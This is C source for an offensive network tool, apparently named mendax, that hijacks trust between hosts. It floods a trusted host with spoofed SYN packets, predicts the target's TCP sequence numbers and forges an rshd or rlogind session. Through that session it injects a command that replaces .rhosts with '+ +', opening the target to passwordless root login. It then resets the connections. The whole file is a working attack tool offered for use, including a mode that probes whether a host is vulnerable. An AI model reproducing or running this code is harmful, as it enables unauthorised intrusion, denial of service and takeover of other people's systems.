#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <net/if.h>
#include <arpa/inet.h>

#ifdef NIT
#include "dnit.h"
#include <net/nit_if.h>
#endif

#include "mendax.h"
#include "packet.h"

#ifndef NIT
#  define send_pak(a, b, c) send_pak((a),(b))
#endif

#ifdef NIT
char ether[6];
#endif
char *progname;
char Packet[PACKETSIZE];
unsigned long our_seq, target_seq;

#ifdef NIT
Nit *nitfd;
#endif

extern char *optarg;
extern int optind, opterr, optopt;

usage()
{
	fprintf(stderr, "Usage: %s [OPTIONS] <source> <target> [<gateway>]\n\n", progname);
	fprintf(stderr, " -p PORT       first port on localhost to occupy\n");
	fprintf(stderr, " -s PORT       server port on <source> to swamp\n");
	fprintf(stderr, " -l USERNAME   user on <source>\n");
	fprintf(stderr, " -r USERNAME   user on <target>\n");
	fprintf(stderr, " -c COMMAND    command to execute\n");
	fprintf(stderr, " -w PORT       wait for a TCP SYN packet on port PORT\n");
	fprintf(stderr, " -d            read data from stdin and send it.\n");
	fprintf(stderr, " -t            test whether attack might succeed\n");
	fprintf(stderr, " -L TERM       spoof rlogind instead of rshd.\n");
	fprintf(stderr, " -S PORT       port from which to sample seq numbers.\n");
	return(0);
}

Exit(msg, ec)
char *msg;
int ec;
{
	fprintf(stderr, "%s: %s\n", progname, msg);
	exit(ec);
}

flood_host(src, dst, pktcount, flags)
struct sockaddr_in *src, *dst;
int pktcount;
unsigned char flags;
{
	int i;
	struct opacket pak;
	struct sockaddr_in from=*src;
	static unsigned short ip_id = 0;
	unsigned long seq_num = 343289783;
	int pktlen;

	for(i = 0 ; i < pktcount; i++) {
		from.sin_port = htons(ntohs(from.sin_port) + 1);
		pktlen = gen_tcp_pak(&pak, &from, dst, ip_id++, 
			             seq_num, 0L, 0, flags);
		seq_num += 64000;
		
		/* don't fire dem packets too fucking fast */
		usleep(1000);
		
		send_pak((char *) &pak, pktlen, ether);
	 	putchar('.');
	}
	putchar('\n');
}

/* if from->sin_port == 0, we accept packets from any
 * port on the remote machine.
 * The same applies to port, except that it's our local port.
 */
tcp_reply(pak, bufsize, from, port, timeout, flags)
char *pak;
u_int bufsize, port;
struct sockaddr_in *from;
struct timeval *timeout;
u_char flags;
{
	char *get_ip_pak();
	struct ip *ihdr;
	struct tcphdr *thdr;
	u_long pktlen;
	char *p;

	if((p=get_ip_pak(timeout, &pktlen)) == NULL)
		return(0);
	
	/* check whether our packet is bigger than our buffer. */
	if(pktlen > bufsize)
		return(0);
		
	/* Yuk! I hate alignments... */
	bcopy(p, pak, (int) pktlen);

	ihdr = (struct ip *) pak;
	thdr = (struct tcphdr *) (pak + ihdr->ip_hl * 4);

	/* bahh.. we only want TCP packets */
	if(ihdr->ip_p != IPPROTO_TCP)
		return(0);

	/* those packets are not for us */
	if(bcmp(&from->sin_addr, &ihdr->ip_src, 4))
		return(0);
	if(from->sin_port && thdr->th_sport != from->sin_port)
		return(0);
	if(port && thdr->th_dport != port)
		return(0);
	if(thdr->th_flags & flags != flags)
		return(0);
	return((unsigned int) pktlen);
}

guess_ackseq(ackseq, from, pktcount)
unsigned long *ackseq;
struct sockaddr_in *from;
unsigned pktcount;
{
	char *get_ip_pak();
	struct diffs {
		unsigned long diff;
		int cnt;
	} diffs[pktcount];
	int highdiff, highcnt;
	int n;
	time_t starttime;
	struct ip *ihdr;
	struct tcphdr *thdr;
	struct timeval timeout;
	unsigned long pktlen;
	unsigned long seqnum, acknum;
	long diff, olddiff;
	int i;
	char *pak;

	timeout.tv_sec = 1;
	timeout.tv_usec = 0;
	starttime = time(NULL);
	for (i=0; i<pktcount; diffs[i++].cnt=0);
	for(i = 0; i < pktcount;) {
		if((time(NULL) - starttime) > (time_t) WAIT)
			break;
		if(!tcp_reply(Packet, 1024, from, 0, &timeout, TH_SYN | TH_ACK))
			continue;

		ihdr = (struct ip *) Packet;
		thdr = (struct tcphdr *) (Packet + ihdr->ip_hl * 4);

		if(i) {
			int n;
			int mt;
			olddiff = diff;
			diff = ntohl(thdr->th_seq) - seqnum; 
/*
 * record the different differences
 */
			for (mt=-1, n=0; n<pktcount; n++) {
				if (diffs[n].cnt) {
					if (diffs[n].diff==diff) diffs[n].cnt++;
					mt=-1;
					break;
				} else mt=i;
			}
			if (mt!=-1) {
				diffs[mt].diff=diff;
				diffs[mt].cnt=1;
			}
		}
		seqnum = ntohl(thdr->th_seq);
		acknum = ntohl(thdr->th_ack);
		printf("\nseq number: %lu, ack number: %lu", seqnum, acknum);
		if(i) 
			printf(" difference: %ld", diff);
#ifdef DEBUG
		hexdump(Packet, pktlen);
#endif
		i++;
	}
	puts("\n");
	for (highdiff=highcnt=n=0; n<pktcount; n++) 
		if (diffs[n].cnt>highcnt) {
			highcnt=diffs[n].cnt;
			highdiff=diffs[n].diff;
		}
	if (highcnt<2)
		printf("no detectable difference pattern.\n");
	else
		diff=highdiff;
	printf("using %ld as prediction difference (%d hit%s).\n", diff, highcnt, (highcnt==1)? "": "s");
	*ackseq = seqnum + diff;
}

tcp_handshake(src, dst, myhost, sampleport)
struct sockaddr_in *src, *dst, *myhost;
u_short sampleport;
{
	struct opacket *pak;
	char *buf;
	u_short ip_id = 0x4189;
	u_short dstport;
	int i;
	
	buf = (char *) malloc(sizeof(struct opacket) * (SAMPLEPACKETS + 1) + 16);
	pak = (struct opacket *) buf;
	our_seq = 0;
	dstport = ntohs(dst->sin_port);
	dst->sin_port = htons(sampleport);
		
	/* Generate TCP SYN packets with myhost's source address */
	for (i = 0; i < SAMPLEPACKETS; i ++) {
		gen_tcp_pak(pak++, myhost, dst, ip_id++, our_seq, 0L, 0, TH_SYN);
		our_seq += 64000;
		myhost->sin_port = htons(ntohs(myhost->sin_port) + 1);
	}
	
	/* Generate TCP SYN packet with src's source address */
	our_seq = 0;
	dst->sin_port = htons(dstport);
	gen_tcp_pak(pak, src, dst, ip_id++, our_seq, 0L, 0, TH_SYN);

	pak = (struct opacket *) buf;	
	
#ifndef NIT
	sock_open();
#endif
	/* Send packets */
	for (i = 0; i < SAMPLEPACKETS + 1; i++) {
		send_pak((char *) pak, sizeof(struct ip) +
			 sizeof (struct tcphdr), ether);
		pak++;
	}

	/* Calculate next possible sequence number */
#ifndef TEST
	dstport = ntohs(dst->sin_port);
	dst->sin_port = htons(sampleport);
	guess_ackseq(&target_seq, dst, SAMPLEPACKETS);
	dst->sin_port = htons(dstport);
#endif
	
	/* acknowledge dst's sequence number */
	pak = (struct opacket *) buf;
	gen_tcp_pak(pak, src, dst, ip_id++, our_seq, ++target_seq, 0, TH_SYN | TH_ACK);
	send_pak((char *) pak, sizeof(struct ip) +
		 sizeof (struct tcphdr), ether);
	
	free(buf);
}

/* When rshd is spoofed, 'data' has to point to command to be
 * executed. For spoofing rlogind, 'data' points to the
 * terminal type.
 */
spoof_rservice(src, dst, remuser, locuser, term, data)
struct sockaddr_in *src, *dst;
char *remuser, *locuser, *term, *data;
{
		int slen;
		char *string, *sptr;

		if((string = malloc(256)) == NULL)
			return (-1);

		bzero(string, 256);
		sptr = string;
		slen = strlen(data) + strlen(remuser) + 
		       strlen(locuser);
		if(term != NULL)
			slen += strlen(term) + 1;

		/* for rlogind */
		if(ntohs(dst->sin_port) == 513) {
			sptr += 1;
			slen += 4;
		}

		/* for rshd */
		if(ntohs(dst->sin_port) == 514) {
			sptr += 2;
			slen += 5;
		}
		/* build data string and send it to r-service */
		bcopy(remuser, sptr, strlen(remuser) + 1);
		sptr += strlen(remuser) + 1;
		bcopy(locuser, sptr, strlen(locuser) + 1);
		sptr += strlen(locuser) + 1;
		if(term != NULL) {
			bcopy(term, sptr, strlen(term) + 1);
			sptr += strlen(term) + 1;
		}
		bcopy(data, sptr, strlen(data) + 1);
		bzero(Packet, PACKETSIZE);
		bcopy(string, Packet + sizeof(struct opacket), slen);
		gen_tcp_pak((struct opacket *) Packet, src, dst, 64, our_seq,
			    target_seq, slen, TH_ACK | TH_PUSH);
		send_pak(Packet, sizeof(struct ip) +
			 sizeof (struct tcphdr) + slen, ether);
		our_seq += slen;
		
		free(string);
}

/* returns value !=0 on success */
test_host(src, dst, myhost)
struct sockaddr_in src, dst, myhost;
{
	time_t starttime;
	struct timeval timeout;
	unsigned int flag = 0;
	unsigned int pktlen;

	timeout.tv_sec = 1;
	timeout.tv_usec = 0;
	printf("sending initial syn packet: ");
#ifndef NIT
	sock_open();
#endif
	flood_host(&myhost, &dst, 1, TH_SYN);
	starttime = time(NULL);
	while(time(NULL) - starttime < WAIT) {
		if((pktlen = (unsigned int)
		   tcp_reply(Packet, 1024, &dst, 
		   0, &timeout, TH_SYN|TH_ACK))) {
			flag++;
			break;
		}
	}
	if(!flag) {
		printf("warning: initial syn packet was not ack'd.\n");
		return(0);
	}
	
	flood_host(&src, &dst, FLOODPACKETS, TH_SYN);
	printf("flooding host with bogus packets: ");
	flood_host(&myhost, &dst, 1, TH_SYN);
	flag = 0;
	starttime = time(NULL);
	while(time(NULL) - starttime < WAIT) {
		if((pktlen = (unsigned int)
		   tcp_reply(Packet, 1024, &dst, 
		   0, &timeout, TH_SYN|TH_ACK))) {
			flag++;
			break;
		}
	}
#ifndef NIT
	sock_close();
#endif
	hexdump(Packet, pktlen);
	printf("resetting host: ");
	flood_host(&src, &dst, FLOODPACKETS, TH_RST);

	return(!flag);
}

send_data(src, dst)
struct sockaddr_in *src, *dst;
{
	FILE *in;
	char string[256];
	int slen, tbytes = 0;
	
	while(fgets(string, 256, stdin) != NULL) {	
		slen = strlen(string);
		bcopy(string, Packet + sizeof(struct opacket), slen);

		gen_tcp_pak((struct opacket *) Packet, src, dst, 64, our_seq,
			    target_seq, slen, TH_ACK | TH_PUSH);
		send_pak(Packet, sizeof(struct ip) +
			 sizeof (struct tcphdr) + slen, ether);
		our_seq += slen;
		
		/* dunno whether this will work... */
		target_seq += tbytes;
		tbytes = slen;
	}
	return(0);
}

main(argc, argv)
int argc;
char **argv;
{
	struct sockaddr_in src, dst, myhost, gw, evil;
	struct timeval timeout;
	unsigned short myport     = 7843,
		       remoteport =  514,
		       serverport =  513,
		       waitport   =    0,
		       sampleport =  514;
	unsigned int ch, tflag = 0, 
			 wflag = 0,
			 dflag = 0,
			 Lflag = 0;
	char hostname[256], 
	     string[256],
	     *sptr;
	char *locuser, *remuser, *command, *term = NULL;

	progname 	= argv[0];
	timeout.tv_sec  = 1;
	timeout.tv_usec = 0;
	command		= "mv .rhosts .r; echo + + > .rhosts";
	remuser		=
	locuser 	= "root";

	gethostname(hostname, 255);

	if (resolve_host (EVILSITE, &evil) < 0)
		Exit("cannot resolve address of EVILSITE.", 1);
	if (resolve_host (hostname, &myhost) < 0)
		Exit("cannot resolve address of localhost.", 1);
#ifdef NIT
	if (resolve_host (GATEWAY, &gw) < 0)
		Exit("cannot resolve address of GATEWAY.", 1);
#endif

	while((ch = getopt(argc, argv, "c:dg:l:p:r:s:tw:L:S:")) != -1) {
		switch(ch) {
			case 'c':
				command = optarg;
				break;
			case 'd':
				dflag++;
				break;
#ifdef NIT
			case 'g':
				if (resolve_host (optarg, &gw) < 0)
					Exit("cannot resolve address of GATEWAY.", 1);
				break;
#endif
			case 'l':
				locuser = optarg;
				break;
			case 'p':
				myport = atoi(optarg);
				break;
			case 'r':
				remuser = optarg;
				break;
			case 's':
				serverport = atoi(optarg);
				break;
			case 't':
				tflag++;
				break;
			case 'w':
				wflag++;
				waitport = atoi(optarg);
				break;
			case 'L':
				term = optarg;
				break;
			case 'S':
				sampleport = atoi(optarg);
				break;
			case '?':
			default:
				usage();
				exit(1);
		}
	}

	if (argc - optind !=2) {
		usage();
		exit(1);
	}
	if(term == NULL)
		remoteport = 514;
	else
		remoteport = 513;

	if (resolve_host (argv[optind++], &src) < 0)
		Exit("cannot resolve hostname.", 1);
	if (resolve_host (argv[optind++], &dst) < 0)
		Exit("cannot resolve hostname.", 1);

	src.sin_port 	= htons(serverport);
	dst.sin_port 	= htons(remoteport);
	myhost.sin_port	= htons(myport);
	evil.sin_port	= htons(200);

#ifdef NIT
	if (arp(&gw.sin_addr, ether) < 0)
		Exit("arp failed for gateway. gateway not on local subnet ?", 1);
	if ((nitfd = NitOpen("le0", NIT_BUFFER, 0, timeout,
	    NI_TIMESTAMP | NI_DROPS | NI_LEN)) == NULL)
		Exit("cannot initialize /dev/nit.", 1);
#endif
	
	if(tflag) {
		dst.sin_port = htons(sampleport);
		if(!test_host(src, dst, myhost))
			printf("attack will probably fail.\n");
		else
			printf("host seems to be unprotected from this attack.\n");
		exit(0);
	}
	
#ifndef NOFLOOD
	/* flood source host with TCP SYN packets */

	printf("flooding source with TCP SYN packets from %s: ", EVILSITE);
	flood_host(&evil, &src, FLOODPACKETS, TH_SYN);
#endif
	/* send TCP SYN packets to target. Calculate the difference
	   of the sequence numbers in the received TCP SYN|ACK packets.
	   The last packet's source address is the address of the
	   host we want to impersonate... Then acknowledge TCP SYN|ACK
	   packet with the sequence number we guessed */

	printf("sampling sequence numbers...\n");
	tcp_handshake(&src, &dst, &myhost, sampleport);

	if(term == NULL) {
		printf("spoofing rshd.\n");
		spoof_rservice(&src, &dst, remuser, locuser, NULL, command);
	}
	else {
		printf("spoofing rlogind.\n");
		spoof_rservice(&src, &dst, remuser, locuser, term, command);
	}
	if(wflag) {
		time_t starttime;
		unsigned int flag = 0;
		unsigned int pktlen;

		starttime = time(NULL);
		dst.sin_port = 0;
		while(time(NULL) - starttime < WAIT) {
			if((pktlen = (unsigned int)
			   tcp_reply(Packet, 1024, &dst, 
			   waitport, &timeout, TH_SYN))) {
				flag++;
				break;
			}
		}
		hexdump(Packet, pktlen);
		dst.sin_port 	= htons(remoteport);

		if(flag) {
			printf("spoofing seemed to be successful.\n");
			sleep(1);
		}
		else
			printf("No TCP packet received within timeout period.\n");
	}
	else
		sleep(3);
		
	if(dflag)
	{
		printf("ready to send data...\n");
		send_data(&src, &dst);
		sleep(3);
	}
	/* Resetting connection */
	printf("resetting TCP target connection: .\n");
	gen_tcp_pak(Packet, &src, &dst, 128, our_seq, 
		    target_seq, 0, TH_RST);
	send_pak(Packet, sizeof(struct ip) +
			 sizeof (struct tcphdr), ether);
#ifndef NOFLOOD
	/* Reset source host's serverport using TCP RST packets.
	   We don't want to wait for a timeout, do we ? */

	printf("resetting source: ");
	flood_host(&evil, &src, FLOODPACKETS, TH_RST);
#endif

#ifdef NIT
	NitClose(nitfd);
#endif
	exit(0);
}
